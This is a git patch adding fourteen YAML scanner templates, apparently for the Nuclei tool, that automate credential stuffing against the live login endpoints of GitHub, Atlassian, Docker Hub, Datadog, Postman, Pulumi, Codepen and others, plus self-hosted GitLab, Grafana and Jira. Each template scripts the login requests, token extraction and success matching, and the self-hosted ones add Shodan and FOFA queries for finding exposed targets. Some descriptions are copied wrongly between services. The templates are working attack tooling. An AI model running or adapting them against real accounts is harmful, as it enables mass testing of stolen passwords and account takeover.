From 6bbd3a0936652c80a99083535f895a3c503e46e9 Mon Sep 17 00:00:00 2001 From: Parth Date: Mon, 8 May 2023 22:35:04 +0530 Subject: [PATCH] added cred template --- .../cloud/atechmedia-codebase.yaml | 55 +++++++++++++++ http/credential-stuffing/cloud/atlassian.yaml | 38 ++++++++++ .../cloud/avnil-pdf-generator.yaml | 37 ++++++++++ http/credential-stuffing/cloud/chefapi.yaml | 32 +++++++++ http/credential-stuffing/cloud/codepen.yaml | 46 ++++++++++++ http/credential-stuffing/cloud/datadog.yaml | 52 ++++++++++++++ .../credential-stuffing/cloud/docker-hub.yaml | 49 +++++++++++++ http/credential-stuffing/cloud/gitea.yaml | 36 ++++++++++ http/credential-stuffing/cloud/github.yaml | 70 +++++++++++++++++++ http/credential-stuffing/cloud/postman.yaml | 52 ++++++++++++++ http/credential-stuffing/cloud/pulmi.yaml | 43 ++++++++++++ .../self-hosted/gitlab.yaml | 66 +++++++++++++++++ .../self-hosted/grafana.yaml | 56 +++++++++++++++ .../credential-stuffing/self-hosted/jira.yaml | 45 ++++++++++++ 14 files changed, 677 insertions(+) create mode 100644 http/credential-stuffing/cloud/atechmedia-codebase.yaml create mode 100644 http/credential-stuffing/cloud/atlassian.yaml create mode 100644 http/credential-stuffing/cloud/avnil-pdf-generator.yaml create mode 100644 http/credential-stuffing/cloud/chefapi.yaml create mode 100644 http/credential-stuffing/cloud/codepen.yaml create mode 100644 http/credential-stuffing/cloud/datadog.yaml create mode 100644 http/credential-stuffing/cloud/docker-hub.yaml create mode 100644 http/credential-stuffing/cloud/gitea.yaml create mode 100644 http/credential-stuffing/cloud/github.yaml create mode 100644 http/credential-stuffing/cloud/postman.yaml create mode 100644 http/credential-stuffing/cloud/pulmi.yaml create mode 100644 http/credential-stuffing/self-hosted/gitlab.yaml create mode 100644 http/credential-stuffing/self-hosted/grafana.yaml create mode 100644 http/credential-stuffing/self-hosted/jira.yaml diff --git a/http/credential-stuffing/cloud/atechmedia-codebase.yaml b/http/credential-stuffing/cloud/atechmedia-codebase.yaml new file mode 100644 index 0000000000..746c0452a7 --- /dev/null +++ b/http/credential-stuffing/cloud/atechmedia-codebase.yaml @@ -0,0 +1,55 @@ +id: atechmedia-codebase-login-check + +info: + name: Atechmedia/Codebase Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid Atechmedia/Codebase account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,atechmedia,codebase,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + Referer: https://identity.atechmedia.com/login + + - | + POST https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + Origin: https://identity.atechmedia.com + Content-Type: application/x-www-form-urlencoded + Referer: https://identity.atechmedia.com/login + Connection: close + + utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login + + + cookie-reuse: true + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div[2]/div/form/input[2] + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: user_session' + - type: status + status: + - 302 diff --git a/http/credential-stuffing/cloud/atlassian.yaml b/http/credential-stuffing/cloud/atlassian.yaml new file mode 100644 index 0000000000..3c9846da7f --- /dev/null +++ b/http/credential-stuffing/cloud/atlassian.yaml @@ -0,0 +1,38 @@ +id: atlassian-login-check + +info: + name: Atlassian Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid atlassian account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,atlassian,creds-stuffing +self-contained: true +requests: + - raw: + - |- + POST https://auth.atlassian.com/co/authenticate HTTP/1.1 + Host: auth.atlassian.com + Content-Type: application/json + Origin: https://id.atlassian.com + Referer: https://id.atlassian.com/ + Connection: close + + {"username":"{{username}}","password":"{{password}}","state":{"csrfToken":"{{rand_text_alpha(10, "")}}"}} + + extractors: + - type: dsl + dsl: + - username + - password + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"error_description":"Wrong email or password."' + - type: status + status: + - 403 diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator.yaml new file mode 100644 index 0000000000..72059bc350 --- /dev/null +++ b/http/credential-stuffing/cloud/avnil-pdf-generator.yaml @@ -0,0 +1,37 @@ +id: avnil-pdf-generator-check + +info: + name: useanvil.com Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid avnil pdf generator account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,avnil-pdf,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://graphql.useanvil.com/ HTTP/1.1 + Host: graphql.useanvil.com + Content-Length: 367 + Content-Type: application/json + + {"operationName":"LoginMutation","variables":{"email":"{{username}}","password":"{{password}}"},"query":"mutation LoginMutation($email: String, $password: String) {\n login(email: $email, password: $password) {\n eid\n firstName\n lastName\n email\n preferences {\n require2FA\n __typename\n }\n extra\n __typename\n }\n}\n"} + + extractors: + - type: dsl + dsl: + - username + - password + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"email":"' + - '"eid":"' + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/chefapi.yaml b/http/credential-stuffing/cloud/chefapi.yaml new file mode 100644 index 0000000000..e4b6fb994f --- /dev/null +++ b/http/credential-stuffing/cloud/chefapi.yaml @@ -0,0 +1,32 @@ +id: chefio-login-check +info: + name: Chef.io Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid chef.io account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,chefio,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://api.chef.io/login HTTP/1.1 + Host: api.chef.io + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 + Content-Length: 160 + + utf8=%E2%9C%93&authenticity_token=&authenticity_token=&to=https://api.chef.io/login-success&username={{username}}&password={{password}}&commit=Sign+In + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: https://api.chef.io/login-success' + - type: status + status: + - 302 diff --git a/http/credential-stuffing/cloud/codepen.yaml b/http/credential-stuffing/cloud/codepen.yaml new file mode 100644 index 0000000000..3390d97ae5 --- /dev/null +++ b/http/credential-stuffing/cloud/codepen.yaml @@ -0,0 +1,46 @@ +id: codepen-login-check +info: + name: codepen.io Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid codepen account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,codepen,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://codepen.io/login HTTP/1.1 + Host: codepen.io + + - | + POST https://codepen.io/login/login HTTP/1.1 + Host: codepen.io + Content-Type: application/x-www-form-urlencoded + X-CSRF-Token: {{token}} + + authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage + + extractors: + - type: dsl + dsl: + - username + - password + - type: xpath + part: body + xpath: + - '//input[@name="authenticity_token"]/@value' + name: token + internal: true + matchers-condition: and + matchers: + - type: word + part: body + negative: true + words: + - 'The username or password you entered is incorrect, please try again.' + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/datadog.yaml b/http/credential-stuffing/cloud/datadog.yaml new file mode 100644 index 0000000000..9031f57720 --- /dev/null +++ b/http/credential-stuffing/cloud/datadog.yaml @@ -0,0 +1,52 @@ +id: datadog-login-check + +info: + name: Datadog Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid datadog account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,datadog,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://app.datadoghq.com/account/login HTTP/1.1 + Host: app.datadoghq.com + + - | + POST https://app.datadoghq.com/account/login? HTTP/1.1 + Host: app.datadoghq.com + Content-Type: application/x-www-form-urlencoded + + _authentication_token={{auth_token}}&username={{username}}&password={{password}} + + + cookie-reuse: true + extractors: + - type: regex + name: auth_token + part: body + internal: true + group: 1 + regex: + - "authentication_token": "(.*?)"," + + - type: dsl + dsl: + - username + - password + + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: dogweb=' + + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/docker-hub.yaml b/http/credential-stuffing/cloud/docker-hub.yaml new file mode 100644 index 0000000000..c2355a1195 --- /dev/null +++ b/http/credential-stuffing/cloud/docker-hub.yaml @@ -0,0 +1,49 @@ +id: docker-hub-login-check + +info: + name: Docker Hub Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid atlassian account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,docker,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://hub.docker.com/v2/users/login HTTP/1.1 + Host: hub.docker.com + Accept: */* + Accept-Language: en-US;q=0.9,en;q=0.8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36 + Connection: close + Content-Type: application/json + + { + "username": "{{username}}", + "password": "{{password}}" + } + + threads: 30 + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'token' + - type: word + part: header + words: + - 'Set-Cookie: token=' + - type: status + status: + - 200 + + extractors: + - type: dsl + dsl: + - username + - password \ No newline at end of file diff --git a/http/credential-stuffing/cloud/gitea.yaml b/http/credential-stuffing/cloud/gitea.yaml new file mode 100644 index 0000000000..7591ca49ab --- /dev/null +++ b/http/credential-stuffing/cloud/gitea.yaml @@ -0,0 +1,36 @@ +id: gitea-login-check + +info: + name: gitea.com Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid gitea account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,gitea,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://gitea.com/user/login HTTP/1.1 + Host: gitea.com + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&password={{password}} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: /' + - type: status + status: + - 303 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/github.yaml b/http/credential-stuffing/cloud/github.yaml new file mode 100644 index 0000000000..8ba24197c7 --- /dev/null +++ b/http/credential-stuffing/cloud/github.yaml @@ -0,0 +1,70 @@ +id: github-login-check + +info: + name: Github Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid github account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,github,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://github.com/login HTTP/1.1 + Host: github.com + + - | + POST https://github.com/session HTTP/1.1 + Host: github.com + Origin: https://github.com + Content-Type: application/x-www-form-urlencoded + Referer: https://github.com/login + + commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} + + cookie-reuse: true + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/input[1] + - type: xpath + name: timestamp + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[10] + - type: xpath + name: timestamp_secret + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[11] + - type: dsl + dsl: + - username + - password + + matchers-condition: or + matchers: + - type: dsl + name: 2fa + dsl: + - "contains(location, 'https://github.com/sessions/two-factor')" + - "status_code==302" + condition: and + + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: logged_in=yes')" + - "contains(to_lower(header), 'set-cookie: user_session=')" + - "status_code==302" + condition: and \ No newline at end of file diff --git a/http/credential-stuffing/cloud/postman.yaml b/http/credential-stuffing/cloud/postman.yaml new file mode 100644 index 0000000000..28f617dc11 --- /dev/null +++ b/http/credential-stuffing/cloud/postman.yaml @@ -0,0 +1,52 @@ +id: postman-login-check + +info: + name: Postman Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid postman account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,postman,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Referer: https://identity.getpostman.com/accounts + + - | + POST https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Content-Type: application/json;charset=UTF-8 + X-Csrf-Token: {{csrfToken}} + Origin: https://identity.getpostman.com + Referer: https://identity.getpostman.com/login + + {"username":"{{username}}","password":"{{password}}"} + + cookie-reuse: true + attack: pitchfork + extractors: + - type: xpath + name: csrfToken + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div/div[1]/form/input + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')" + - "contains(to_lower(body), 'identity.postman.co/continue')" + - "status_code==200" + condition: and \ No newline at end of file diff --git a/http/credential-stuffing/cloud/pulmi.yaml b/http/credential-stuffing/cloud/pulmi.yaml new file mode 100644 index 0000000000..2d281b0382 --- /dev/null +++ b/http/credential-stuffing/cloud/pulmi.yaml @@ -0,0 +1,43 @@ +id: pulmi-login-check + +info: + name: pulmi.com Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid github account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,pulmi,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://api.pulumi.com/api/console/email/login HTTP/1.1 + Host: api.pulumi.com + Content-Length: 48 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + Content-Type: application/json + Origin: https://app.pulumi.com + Referer: https://app.pulumi.com/ + Connection: close + + {"emailOrLogin":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - pulumiAccessToken + - userInfo + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/credential-stuffing/self-hosted/gitlab.yaml b/http/credential-stuffing/self-hosted/gitlab.yaml new file mode 100644 index 0000000000..17194c5174 --- /dev/null +++ b/http/credential-stuffing/self-hosted/gitlab.yaml @@ -0,0 +1,66 @@ +id: gitlab-login-check-self-hosted +info: + name: Gitlab Login Check Self Hosted + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid login on self hosted Grafana instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + shodan-query: product:"GitLab Self-Managed" + fofa-query: product="GitLab" + tags: login-check,gitlab,creds-stuffing,self-hosted + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + Accept-Language: en-US,en;q=0.9,de;q=0.8 + Connection: close + + - | + POST /users/sign_in HTTP/1.1 + Host: {{Hostname}} + Content-Length: 186 + Cache-Control: max-age=0 + Origin: http://{{Hostname}} + DNT: 1 + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + Referer: http://{{Hostname}}/users/sign_in + Accept-Language: en-US,en;q=0.9,de;q=0.8 + Connection: close + + authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0 + cookie-reuse: true + attack: pitchfork + + extractors: + - type: regex + part: body + internal: true + name: authenticity_token + group: 1 + regex: + - '"/users/sign_in".*?authenticity_token"\s+value="([^"]+)"' + + - type: dsl + dsl: + - username + - password + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - status_code_2 == 302 + - '!contains(to_lower(body_2), "invalid login")' + condition: and diff --git a/http/credential-stuffing/self-hosted/grafana.yaml b/http/credential-stuffing/self-hosted/grafana.yaml new file mode 100644 index 0000000000..fed02e654b --- /dev/null +++ b/http/credential-stuffing/self-hosted/grafana.yaml @@ -0,0 +1,56 @@ +id: grafana-login-check + +info: + name: Grafana Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid login on self hosted Grafana instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + shodan-query: title:"Grafana" + fofa-query: title="Grafana" + tags: login-check,grafana,creds-stuffing,self-hosted + +variables: + username: "{{username}}" + password: "{{password}}" + +requests: + - raw: + - |- + POST /login HTTP/1.1 + Host: {{Hostname}} + accept: application/json, text/plain, */* + DNT: 1 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login + Accept-Language: en-US,en;q=0.9,de;q=0.8 + Cookie: redirect_to=%2F + Connection: close + + {"user":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Logged in' + + - type: word + part: header + words: + - 'grafana_session' + + - type: status + status: + - 200 diff --git a/http/credential-stuffing/self-hosted/jira.yaml b/http/credential-stuffing/self-hosted/jira.yaml new file mode 100644 index 0000000000..6a4e5d01d9 --- /dev/null +++ b/http/credential-stuffing/self-hosted/jira.yaml @@ -0,0 +1,45 @@ +id: jira-login-check + +info: + name: Jira Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid login on self hosted Jira instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + shodan-query: http.component:"Atlassian Jira" + fofa-query: product="JIRA" + tags: login-check,jira,creds-stuffing,self-hosted + +variables: + username: "{{username}}" + password: "{{password}}" + +requests: + - raw: + - |- + POST /rest/gadget/1.0/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + os_username={{username}}&os_password={{password}} + + extractors: + - type: dsl + dsl: + - username + - password + + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"loginSucceeded":true' + - type: status + status: + - 200